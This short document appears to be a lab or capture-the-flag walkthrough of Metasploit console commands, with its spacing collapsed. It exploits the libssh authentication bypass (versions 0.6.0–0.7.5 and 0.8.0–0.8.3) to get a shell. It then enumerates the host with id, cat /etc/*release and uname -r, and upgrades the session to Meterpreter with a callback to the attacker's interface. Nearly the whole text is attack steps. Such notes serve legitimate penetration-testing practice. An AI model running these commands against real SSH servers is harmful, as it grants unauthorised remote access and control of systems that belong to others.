searchlibssh_auth_bypassuseauxiliary/scanner/ssh/libssh_auth_bypassinfo# Description:# This module exploits an authentication bypass in libssh server code # where a USERAUTH_SUCCESS message is sent in place of the expected # USERAUTH_REQUEST message. libssh versions 0.6.0 through 0.7.5 and # 0.8.0 through 0.8.3 are vulnerable. Note that this module's success # depends on whether the server code can trigger the correct # (shell/exec) callbacks despite only the state machine's # authenticated state being set. Therefore, you may or may not get a # shell if the server requires additional code paths to be followed.optionssetSPAWN_PTYtruerunsessionssessions3
Enumerate some information
idcat/etc/*releaseuname-r
Shell to Meterpreter post exploitation
background# or CTRL+Zsearchshell_to_meterpreterusepost/multi/manage/shell_to_meterpretersetSESSION3setLHOSTeth1runsessionssessions4